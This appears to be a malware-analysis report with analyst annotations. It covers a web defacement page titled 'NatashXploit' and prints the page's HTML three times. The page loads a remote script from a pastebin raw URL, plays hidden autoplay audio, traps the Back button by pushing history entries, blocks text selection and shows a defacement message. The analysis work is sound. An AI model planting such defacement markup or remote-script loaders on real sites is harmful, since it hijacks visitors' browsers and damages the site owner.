PHP Malware Analysis

xxxx.html

md5: 6fdc1e89ed0a881ffb39a69a544a8a58


Screenshot


Attributes

Title

URLs


Deobfuscated PHP code

<!-- Analyst annotations: static defacement page titled "NatashXploit". No PHP open tag appears in this listing, so nothing here runs server-side; every effect is in the visitor's browser. The markup is malformed in several places (noted inline), so rendering relies on browser error recovery. -->
<html>
 <head>
  <title>NatashXploit</title>
   <!-- upgrade-insecure-requests only rewrites http subresource URLs to https; this policy has no script-src, so it places no limit on the external script loaded below. The second meta name contains a comma ("google-site-verificat,ion"), so it is not the usual verification name. -->
   <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> <meta name="google-site-verificat,ion" content="MMT"/>
    <!-- First of two conflicting charset declarations (Windows-1254 here, utf-8 further down). -->
    <meta name="theme-color" content="green"> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/>
     <meta name="description" content="I'm Cheater">
      <meta name="author" content="Cheater"/>
       <meta name="keywords" content="Cheater"/>
       <!-- robots, googlebot and googlebot-news are all set to "all"; presumably so that crawlers index the defaced page. -->
       <meta name="googlebot" content="all"/>
        <meta name="robots" content="all" />
         <meta name="googlebot-news" content="all" />
          <meta name="google" content="notranslate"/> <meta name="og:title" content="Cheater"/>
           <!-- Link preview metadata points at an image on c.top4top.io (external host, network indicator). og:site_name holds the same image URL rather than a name. -->
           <meta property="og:site_name" content="https://c.top4top.io/p_1513avyg20.png"> <meta property="og:image" content="https://c.top4top.io/p_1513avyg20.png" />
           <meta property="og:type" content="website" />
            <meta property="og:updated_time" content="1440432930" />
             <!-- Stray closing span with no matching open tag (parse error), followed by the second, conflicting charset declaration. -->
             </span> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
              <!-- Remote script fetched from a pastebin.com raw paste, with no integrity attribute. Its body is not part of this sample and can be changed by the paste owner at any time, so a static review of this file does not cover what the page actually executes. Treat the URL as a network indicator. -->
              <script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe">
               </script>
                </head>
                 <!-- The style element sits after the closing head tag and before body, which is malformed. The rules are cosmetic: black full-width page with overflow hidden and a glitch animation ("lamerkaratan") on h1. The @import uses a protocol-relative URL to fonts.googleapis.com, and the @keyframes block is never closed. The body tag on the same line disables scrolling and cancels drag and text selection through inline handlers. -->
                 <style type="text/css"> @import url("//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-color:#000; } i{ margin:10px; } a:link{ color:#000; } h1{ color: #000; text-decoration: none; border-radius:0px; border:0px; font-family: Shadows Into Light , cursive; font-size:50px; margin:0px; padding:0px; animation:lamerkaratan 0.5s linear infinite; } #pojok{ position:absolute; bottom:0px; right:0px; } pre{ color:white; } marquee{ width:100%; } @keyframes lamerkaratan{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style> <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">
                  <!-- Zero-size embed of a SoundCloud player URL with autostart and loop attributes: an attempt at hidden background audio (whether it plays depends on the browser). The inline script then pushes 20 history entries for the current URL, so the Back button keeps the visitor on this page. The arguments passed to the function are unused. -->
                  <embed src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/143733046" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script>
                   <!-- Visible defacement message; the center element is never closed. -->
                   <center><h1><font color="green">Cheat? yes, I'm</font> Cheater!!</h1></body>
                    </html>

Execution traces


Generated HTML code

<!-- Analyst annotations: markup of the same defacement page after HTML parsing. Compared with the source listings on this page, the stray closing span is gone, the style element now sits inside head, and the center element has been closed; these differences come from parser error recovery. The content of the remote script is not shown anywhere in this listing. -->
<html><head>
  <title>NatashXploit</title>
   <!-- upgrade-insecure-requests only rewrites http subresource URLs to https; this policy has no script-src, so it places no limit on the external script loaded below. The second meta name contains a comma, so it is not the usual verification name. -->
   <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> <meta name="google-site-verificat,ion" content="MMT">
    <!-- First of two conflicting charset declarations (Windows-1254 here, utf-8 further down). -->
    <meta name="theme-color" content="green"> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254">
     <meta name="description" content="I'm Cheater">
      <meta name="author" content="Cheater">
       <meta name="keywords" content="Cheater">
       <!-- Crawler directives are all set to "all"; presumably so that the defaced page gets indexed. -->
       <meta name="googlebot" content="all">
        <meta name="robots" content="all">
         <meta name="googlebot-news" content="all">
          <meta name="google" content="notranslate"> <meta name="og:title" content="Cheater">
           <!-- Link preview metadata points at an image on c.top4top.io (external host, network indicator). -->
           <meta property="og:site_name" content="https://c.top4top.io/p_1513avyg20.png"> <meta property="og:image" content="https://c.top4top.io/p_1513avyg20.png">
           <meta property="og:type" content="website">
            <meta property="og:updated_time" content="1440432930">
              <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
              <!-- Remote script reference to a pastebin.com raw paste, with no integrity attribute. The script element is empty here, so this listing does not show what the paste returned or did; the paste owner can change it at any time. Treat the URL as a network indicator. -->
              <script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe">
               </script>
                <!-- Cosmetic rules only: black page with overflow hidden and a glitch animation ("lamerkaratan") on h1. The @import uses a protocol-relative URL to fonts.googleapis.com, and the @keyframes block is never closed. -->
                <style type="text/css"> @import url("//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-color:#000; } i{ margin:10px; } a:link{ color:#000; } h1{ color: #000; text-decoration: none; border-radius:0px; border:0px; font-family: Shadows Into Light , cursive; font-size:50px; margin:0px; padding:0px; animation:lamerkaratan 0.5s linear infinite; } #pojok{ position:absolute; bottom:0px; right:0px; } pre{ color:white; } marquee{ width:100%; } @keyframes lamerkaratan{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style></head>
                  <!-- The body tag disables scrolling and cancels drag and text selection through inline handlers. -->
                  <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">
                  <!-- Zero-size embed of a SoundCloud player URL with autostart and loop attributes: an attempt at hidden background audio. The inline script pushes 20 history entries for the current URL, so the Back button keeps the visitor on this page. -->
                  <embed src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/143733046" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script>
                   <!-- Visible defacement message. -->
                   <center><h1><font color="green">Cheat? yes, I'm</font> Cheater!!</h1>
                    </center></body></html>

Original PHP code

<!-- Analyst annotations: sample as submitted, a static defacement page titled "NatashXploit". No PHP open tag appears in this listing, so nothing here runs server-side; every effect is in the visitor's browser. The markup is malformed in several places (noted inline), so rendering relies on browser error recovery. -->
<html>
 <head>
  <title>NatashXploit</title>
   <!-- upgrade-insecure-requests only rewrites http subresource URLs to https; this policy has no script-src, so it places no limit on the external script loaded below. The second meta name contains a comma ("google-site-verificat,ion"), so it is not the usual verification name. -->
   <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> <meta name="google-site-verificat,ion" content="MMT"/>
    <!-- First of two conflicting charset declarations (Windows-1254 here, utf-8 further down). -->
    <meta name="theme-color" content="green"> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/>
     <meta name="description" content="I'm Cheater">
      <meta name="author" content="Cheater"/>
       <meta name="keywords" content="Cheater"/>
       <!-- robots, googlebot and googlebot-news are all set to "all"; presumably so that crawlers index the defaced page. -->
       <meta name="googlebot" content="all"/>
        <meta name="robots" content="all" />
         <meta name="googlebot-news" content="all" />
          <meta name="google" content="notranslate"/> <meta name="og:title" content="Cheater"/>
           <!-- Link preview metadata points at an image on c.top4top.io (external host, network indicator). og:site_name holds the same image URL rather than a name. -->
           <meta property="og:site_name" content="https://c.top4top.io/p_1513avyg20.png"> <meta property="og:image" content="https://c.top4top.io/p_1513avyg20.png" />
           <meta property="og:type" content="website" />
            <meta property="og:updated_time" content="1440432930" />
             <!-- Stray closing span with no matching open tag (parse error), followed by the second, conflicting charset declaration. -->
             </span> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
              <!-- Remote script fetched from a pastebin.com raw paste, with no integrity attribute. Its body is not part of this sample and can be changed by the paste owner at any time, so a static review of this file does not cover what the page actually executes. Treat the URL as a network indicator. -->
              <script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe">
               </script>
                </head>
                 <!-- The style element sits after the closing head tag and before body, which is malformed. The rules are cosmetic: black full-width page with overflow hidden and a glitch animation ("lamerkaratan") on h1. The @import uses a protocol-relative URL to fonts.googleapis.com, and the @keyframes block is never closed. The body tag on the same line disables scrolling and cancels drag and text selection through inline handlers. -->
                 <style type="text/css"> @import url("//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-color:#000; } i{ margin:10px; } a:link{ color:#000; } h1{ color: #000; text-decoration: none; border-radius:0px; border:0px; font-family: Shadows Into Light , cursive; font-size:50px; margin:0px; padding:0px; animation:lamerkaratan 0.5s linear infinite; } #pojok{ position:absolute; bottom:0px; right:0px; } pre{ color:white; } marquee{ width:100%; } @keyframes lamerkaratan{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style> <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">
                  <!-- Zero-size embed of a SoundCloud player URL with autostart and loop attributes: an attempt at hidden background audio (whether it plays depends on the browser). The inline script then pushes 20 history entries for the current URL, so the Back button keeps the visitor on this page. The arguments passed to the function are unused. -->
                  <embed src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/143733046" type="audio/mpeg" autostart="true" loop="true" height="0" width="0"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script>
                   <!-- Visible defacement message; the center element is never closed. -->
                   <center><h1><font color="green">Cheat? yes, I'm</font> Cheater!!</h1></body>
                    </html>